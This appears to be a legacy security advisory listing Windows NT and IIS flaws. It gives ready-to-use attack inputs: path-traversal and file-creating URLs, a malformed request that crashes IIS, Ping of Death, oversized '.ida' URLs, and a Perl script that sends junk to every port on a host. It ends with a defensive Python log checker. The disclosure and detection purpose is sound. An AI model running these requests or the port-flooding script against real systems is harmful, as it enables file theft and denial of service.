Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";   # the old Perl chat library; provides chat::open_port, chat::print and chat::close

$systemname = shift @ARGV or die "usage: perl poke servername\n";

$verbose = 1;    # tell me what you're hitting
$knownports = 1; # don't hit known problem ports (53, 135, 1031 above)
for ($port = 1; $port < 65535; $port++)   # original used $0 (the script name), which is not a port number
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    unless ($fh) {          # nothing listening or connection refused: skip it
        print "Port $port: no connection\n" if $verbose;
        next;
    }
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: 4.0

Using a telnet application to get to a webserver via HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response allows him to gain further knowledge of how the web site is organized and the directory structure of the server.
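As an added example (not part of the original posting), a small Python checker a defender can run over web-server request lines to flag the URL forms described above: the ..\.. traversal and scripts..\..\script forms, the >PATH\target.bat redirect and its %0A%0D variant, and the .ida/.idq path-disclosure and oversized-"ida" requests. The sample request lines are constructed, and the length threshold and tag names are this example's own assumptions.

```python
import re
from urllib.parse import unquote

# Threshold and tag names are this example's own assumptions, not from the page.
MAX_PATH_LEN = 1024
# '..' as a whole path component with either separator (IIS accepted backslashes).
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.($|[\\/])")


def classify(request_line):
    """Return sorted tags for one HTTP request line (e.g. from a web log or a
    proxy capture); an empty list means none of the described forms matched."""
    parts = request_line.split()
    if len(parts) < 2:
        return ["malformed"]
    path = unquote(parts[1])  # decode %0A%0D etc. into the bytes IIS would see
    tags = set()
    if TRAVERSAL_RE.search(path):
        tags.add("traversal")  # ..\.. or ../.. leaving the content root
    if ">" in path:
        tags.add("redirect")  # scripts/x.bat>PATH\target.bat file creation
    if "\r" in path or "\n" in path:
        tags.add("crlf")  # the script_name%0A%0D>... output-file variant
    if path.lower().endswith((".ida", ".idq")):
        tags.add("idq_ida")  # path-disclosure / crash extension
    if len(path) > MAX_PATH_LEN:
        tags.add("oversized")  # the 25 KB run of dots before "ida"
    return sorted(tags)


def scan(lines):
    """Map each flagged request line to its tags; clean lines are omitted."""
    return {line: tags for line in lines if (tags := classify(line))}


# Constructed sample request lines mirroring the URL forms quoted above.
SAMPLE_REQUESTS = [
    "GET /index.htm HTTP/1.0",
    "GET /..\\.. HTTP/1.0",
    "GET /scripts..\\..\\scriptname HTTP/1.0",
    "GET /scripts/exploit.bat>PATH\\target.bat HTTP/1.0",
    "GET /scripts/script_name%0A%0D>PATH\\target.bat HTTP/1.0",
    "GET /" + "." * 25000 + "ida HTTP/1.0",
    "GET /anything.idq HTTP/1.0",
    "GET ../..",  # the raw telnet request that crashed inetinfo
]

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_REQUESTS).items():
        print(",".join(tags), line[:60])
```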